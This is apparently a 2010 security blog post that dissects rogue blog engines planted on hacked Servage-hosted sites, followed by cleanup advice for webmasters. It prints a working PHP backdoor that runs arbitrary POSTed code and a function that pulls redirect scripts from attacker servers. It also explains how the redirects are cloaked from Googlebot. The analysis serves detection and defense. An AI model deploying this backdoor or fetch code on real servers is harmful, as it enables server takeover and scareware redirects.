
Internals of Rogue Blogs

   17 Mar 10   Filed in Website exploits

Back in November, I wrote about rogue blogs created in subdirectories of legitimate websites. The blogs poisoned Google search results for millions of relatively unpopular keywords (the long tail), redirecting visitors to scareware websites. This hack mainly affected sites hosted on the Servage network.

Recently, I was contacted by one of Servage’s clients who found his sites hacked:

I noticed the anomalous traffic to domains that are essentially either completely parked or just used for email addresses (SMTP forwarding rather than anything ‘clever’ with webmail.) That led me to the file structures and a quick google led me to your site.

He sent me the offending files he found under his account (thanks Matthew). Now I can share my analysis of the files with you.

In my previous post, I speculated about the internal structure of the rogue blogs. Now that I have the files, I can say that all my guesses proved to be correct.

Blog engine

Indeed, a full-featured yet minimalistic PHP blog engine powers the rogue blogs.

The whole engine consists of only 4 files:

  • index.php – the main file of the engine: less than 500 lines of PHP code and less than 18 KB on disk.
  • template.php – the web page template, which uses the data provided by index.php. About 20 KB.
  • categories.dat – serialized blog categories (see the sketch after this list).
  • .htaccess – rewrite rules to support SEO-friendly URLs.
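
Since categories.dat holds serialized blog categories, the engine most likely reads and writes it with PHP’s native serialize()/unserialize(). Here’s a minimal sketch of that idea (the actual structure of the hackers’ file is an assumption):

<?php
// Sketch only: the real structure of categories.dat is an assumption.
// Native serialization lets the engine persist data without a database.
$categories = array('music', 'movies', 'celebrities');
file_put_contents('categories.dat', serialize($categories));

// Later, index.php can restore the array with a single call:
$categories = unserialize(file_get_contents('categories.dat'));
?>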

And this engine is indeed anonymous. I couldn’t find any credits: no names, no licenses, just the code. The only clue I found was the User-Agent string of its ping requests: WeirD blog engine.

Features

The engine can do pretty much everything you would expect a blog engine to do:

  • add/remove entries
  • break down entries by categories
  • display entries in chronological order
  • support SEO-friendly URLs
  • notify services like Ping-O-Matic, Technorati, Google Blogsearch and Weblogs about new posts (a ping sketch follows this list)
  • provide RSS feeds
  • support trackbacks
  • support custom templates
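
The ping notifications can be implemented with the standard weblogUpdates.ping XML-RPC call that services like Ping-O-Matic accept. The engine’s actual ping code wasn’t published (only its WeirD blog engine User-Agent was visible), so the sketch below is just an illustration; the blog name and URL are placeholders:

<?php
// Sketch of a weblogUpdates.ping XML-RPC request (placeholder blog/URL).
$request = '<?xml version="1.0"?>
<methodCall>
  <methodName>weblogUpdates.ping</methodName>
  <params>
    <param><value>Example Blog</value></param>
    <param><value>http://example.com/blog/</value></param>
  </params>
</methodCall>';

$context = stream_context_create(array('http' => array(
    'method'  => 'POST',
    'header'  => "Content-Type: text/xml\r\nUser-Agent: WeirD blog engine\r\n",
    'content' => $request,
)));
// rpc.pingomatic.com is Ping-O-Matic's public XML-RPC endpoint.
$response = file_get_contents('http://rpc.pingomatic.com/', false, $context);
?>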

Flat files

The entries (there are hundreds of them) are stored in flat .txt files in the same directory. This makes the engine database-independent, so it can work on most servers. The only requirements are:

  • PHP
  • sufficient directory permissions to create files
  • Apache (to use SEO-friendly URLs)

Here’s the content of one such text file (blonde-avril-lavigne.txt):

blonde avril lavigne
<img src="http://lh5.ggpht.com/elaing.zhang/SNxxYg5W9iI/AAAAAAAAUzE/Y75n9lb2xmg/s800/avril-lavigne80926003.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://lh3.ggpht.com/elaing.zhang/SNxxYxT7YwI/AAAAAAAAUzM/CZ832w22_Go/s800/avril-lavigne80926004.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://images.teamsugar.com/files/users/2/20652/34_2007/76335776.preview_0.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://www.judiciaryreport.com/images/avril-lavigne-pic.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://static.desktopnexus.com/wallpapers/4138-bigthumbnail.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />

As you can see, the files are straightforward: the title on the first line, followed by the content. In this case, the content is five images (Google Image search results for the corresponding keywords).
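
Rendering such a file takes only a few lines of PHP. The engine’s actual parsing code wasn’t published, but a sketch of the obvious approach looks like this:

<?php
// Sketch: the first line of the flat file is the title, the rest is HTML.
$lines = file('blonde-avril-lavigne.txt', FILE_IGNORE_NEW_LINES);
$title = array_shift($lines);    // "blonde avril lavigne"
$body  = implode("\n", $lines);  // the five <img> tags
echo '<h1>' . htmlspecialchars($title) . '</h1>' . $body;
?>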

.htaccess

Since the purpose of the rogue blogs is to poison search results, SEO-friendly URLs are a required feature of the blog engine. This engine uses rewrite rules in .htaccess files:

RewriteEngine On
RewriteRule ^category/([^/\.]+)/?$ index.php?category=$1 [L]
RewriteRule ^category/([^/\.]+)/page/([0-9]+)/?$ index.php?category=$1&page=$2 [L]
RewriteRule ^download/([^/\.]+)/?$ download.php?id=$1 [L]
RewriteRule ^page/([0-9]+)/?$ index.php?page=$1 [L]
RewriteRule ^([^/\.]+)/?$ index.php?id=$1 [L]
RewriteRule ^rss20.xml$ index.php?action=rss [L]
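
These rules translate the pretty URLs into plain query strings, so index.php only needs to dispatch on $_GET parameters. A hypothetical dispatcher mirroring the rules above might look like this (the variable names are illustrative, not the engine’s real code):

<?php
// Hypothetical routing that mirrors the rewrite rules above.
if (isset($_GET['action']) && $_GET['action'] === 'rss') {
    $view = 'rss';                           // /rss20.xml
} elseif (isset($_GET['category'])) {
    $view = 'category';                      // /category/<name>/...
    $category = basename($_GET['category']);
} elseif (isset($_GET['id'])) {
    $view = 'entry';                         // /<post-slug>/
    $file = basename($_GET['id']) . '.txt';  // the flat file for the post
} else {
    $view = 'front';                         // / or /page/<n>/
}
$page = isset($_GET['page']) ? max(1, (int)$_GET['page']) : 1;
include 'template.php';                      // renders the selected view
?>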

Malicious features

What makes these blogs malicious are the following modifications to the original engine.

css.js

All blog pages contain the following script tag (shown here as it appears in the template, with the PHP concatenation intact):

<script type="text/javascript" src="'.$blog['homepageUrl'].'css.js"></script>

The script redirects visitors who come from search engines to scareware sites. The content of this script constantly changes, redirecting people to new, not-yet-blacklisted sites. Here is how they do it behind the scenes:
function get_js_file($filename) {
    // Refresh the local copy if it is missing or more than an hour old
    if (!file_exists($filename) or time() - filemtime($filename) > 3600) {
        $js_file = @file_get_contents('hxxp://t.xmlstats .in/b-m-2/'.$filename);
        if (!$js_file) {  // fall back to the second hackers' server
            $js_file = @file_get_contents('hxxp://t.jsonstats .in/b-m-2/'.$filename);
        }
        if ($js_file) {
            @file_put_contents($filename, $js_file);
        }
    }
}

As you can see, this code tries to update the css.js file by downloading new content from the hackers’ sites: t.xmlstats .in, t.jsonstats .in and, in some versions of the engine, t.jsstats .in.

This is how hackers make sure their blogs always redirect to currently active scareware sites.

Anti-Googlebot

Another modification is code that detects requests from Google’s network by checking the IP address against known Google IP ranges. If a request from Google is detected, the css.js file is replaced with css.google.js. This way, hackers try to hide the malicious redirects from Googlebot when it indexes the rogue blogs. The fact that I can see many such blogs in Google search results without any warnings shows that this simple trick does its job.
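
The engine’s actual IP list and check weren’t published, but the cloaking logic amounts to something like the sketch below (66.249.64.0/19 is a well-known Googlebot range, used here purely as an example):

<?php
// Sketch of the cloaking check; the engine's real IP ranges are unknown.
function is_google_ip($ip) {
    $ranges = array('66.249.64.0/19');  // assumed list of Google ranges
    foreach ($ranges as $range) {
        list($subnet, $bits) = explode('/', $range);
        $mask = -1 << (32 - (int)$bits);
        if ((ip2long($ip) & $mask) == (ip2long($subnet) & $mask)) {
            return true;
        }
    }
    return false;
}

// Serve the harmless file to Googlebot, the redirector to everyone else.
$js = is_google_ip($_SERVER['REMOTE_ADDR']) ? 'css.google.js' : 'css.js';
readfile($js);
?>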

Different generations

In November, I discovered that there had been several different generations of the rogue blogs. Checking the files I received from Matthew, I found those generations sitting in separate subdirectories: blog, bmblog, bmsblog.

Backdoor script

Another interesting file I received is the index.php that sits one level above the directories with the rogue blogs:

<?php
error_reporting(E_ALL);
// Run attacker-supplied code only when the POSTed password matches the hash
if (md5($_POST['5758e26e']) == '068f4646e8e1aefcdcd184e31e33af47') {
    $test_func = create_function('', urldecode($_POST['f']));
    $test_func();
}
?>

This is a typical backdoor script that executes whatever PHP code hackers send in the parameters of POST requests (the md5 check works as a password, so only someone who knows the right value can use it).

Apparently, this script was used to create all other rogue files and directories. The question is how this backdoor script got there in the first place.

When Matthew asked Servage what had happened to his sites, they accused him of using insecure scripts, despite the fact that his site didn’t use any scripts at all.

As I showed in my previous post, more than 85% of the discovered rogue blogs are hosted by Servage, so I’m almost sure some Servage-specific security hole was used. (Pure speculation: for example, it could be some PHP shell that hackers used to find user accounts with writable directories. And the internal Servage architecture might help such a script propagate to different physical servers.)

Still active

While the first generation of these rogue blogs appeared in April of last year, this attack is still active. I can still see quite a few rogue bmsblog blogs whose most recent posts are dated March 2010. And some of them (though not all) can be found via the Google search inurl:bmsblog/category 2010.

To Webmasters

While this particular attack mainly affects clients of the Servage hosting company, it is quite typical of hacks that create rogue web pages on compromised websites. So the following advice should be useful for most webmasters.

1. Make sure your server directories are writable only by you. This is especially important in a shared hosting environment, where hackers can use a compromised neighbor account to find writable directories in the rest of the sites on the same server and then create rogue content there (see the sketch below).
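
Here’s a hypothetical audit helper (my own sketch, not part of the attack) that lists directories under the current folder that are writable by group or others:

<?php
// Hypothetical audit helper: report group/world-writable directories.
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator('.', FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $path => $info) {
    if ($info->isDir() && (fileperms($path) & 0022)) {
        echo $path, " is group/world-writable\n";
    }
}
?>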

2. Regularly scan your server for any suspicious files and directories.

3. Regularly check raw server logs. You may find requests to files that shouldn’t be there.

4. Pay special attention to POST requests. They are very popular with backdoor scripts. Just compile a list of files accessed via POST requests and check whether you recognize all of them (see the sketch below).
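
For example, a throwaway script like this can pull that list out of a raw Apache access log (the log path is an assumption; adjust it for your host):

<?php
// Hypothetical log audit: count every URL requested via POST.
$posts = array();
foreach (file('/var/log/apache2/access.log') as $line) {
    if (preg_match('/"POST ([^ "]+)/', $line, $m)) {
        $url = $m[1];
        $posts[$url] = isset($posts[$url]) ? $posts[$url] + 1 : 1;
    }
}
arsort($posts);  // most frequently POSTed URLs first
foreach ($posts as $url => $hits) {
    echo $hits, "\t", $url, "\n";
}
?>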

5. Many shared hosting plans include Webalizer. Every now and then, check its reports. While they are normally not as useful as Google Analytics reports, they have one important advantage: they track all files under your account, not only those where you inserted a tracking code. So in Webalizer you can see requests to files created by hackers, while Google Analytics completely misses this sort of data.

6. Hackers usually create rogue web pages to poison Google search results, so it’s natural to use Google to detect this sort of hack. Regularly use Google to check what is indexed on your site, using the site:your_site_domain.com search command.

7. Regularly check reports in Google Webmaster Tools. They may also reveal suspicious activity. Useful reports: Top search queries, Keywords, Links to your site.

8. If you find new directories with rogue files, disallow them in robots.txt. This tells Google that you don’t want those directories indexed. Otherwise, even if you delete the files, Google may keep them in its index for quite some time (who knows, maybe you removed them only temporarily while, say, redesigning your site).

For example, if you find rogue files in /cgiproxy/bmsblog/, the robots.txt should be:
User-agent: *
Disallow: /cgiproxy/bmsblog/

9. And don’t forget about other types of hacks that mess with your existing files. Regularly check your site for consistency and for any illicit content that hackers may have injected into your web pages (this is where my Unmask Parasites service can help).

Call for information

This case is not completely investigated yet. For example, I still don’t know why the attack mainly hits Servage or how exactly it propagates. This information could help Servage clients prevent infection of their sites. And the guys at Servage probably need it too, since it looks like they can’t stop this attack themselves (and it has been active for about a year now!).

And if you have interesting information about any other hacker attack, please share it with me and the readers of this blog. I’m always looking for malicious files that webmasters find on their compromised servers; they can tell a lot about how the attacks work. So before deleting any offending content, consider contacting me first.

Thanks for reading this blog. Your comments are welcome.


Reader's Comments (4)

  1.

    While using robots.txt to disallow the folders in question will eventually work, you’ll be left with a large number of URL-only listings for those pages in the SERPs for a very long time.

    A more effective method would be to create an HTML file somewhere that includes the <meta name="robots" content="noindex,nofollow,noarchive"> directive and then to internally rewrite all requests for any affected URL to this page.

    RewriteEngine On
    RewriteRule ^(bm(s)?)?blog/ /noindex.html [NC,L]

    This will result in far quicker and more effective removal from search engine results.

    An alternative method is to return a 404 Not Found or, better still, a 410 Gone response for all of those URLs. That’s also effective.

    RewriteEngine On
    RewriteRule ^(bm(s)?)?blog/ - [G]

    I think I might use the noindex solution for a few weeks and then swap to ‘Gone’ once search engines have removed the majority of the rogue pages from the SERPs.

    As well as Google, don’t forget to check in Yahoo, Bing and others.

  2.

    Thanks

    Indeed, a disallow in robots.txt cannot guarantee immediate removal of the rogue pages from Google’s index.

    “410 Gone” works better than “404 Not Found” as it’s a stronger indication that the page is gone for good.

    Removed pages lingering in Google’s index for quite some time is a problem that affects many webmasters of hacked sites, so it would be really good to identify the most efficient way to get rid of them.

    I didn’t try this <meta name="robots" content="noindex,nofollow,noarchive"> method. How quick is it?

  3.

    [...] a hacked PHP web application. Fraudsters often use compromised websites, but also sometimes use special blog software. Serving this kind of browser-specific content is nothing new, but it has previously tended to be [...]

  4.

    [...] recently documented at least two samples of malware that gets injected into blogs and [...]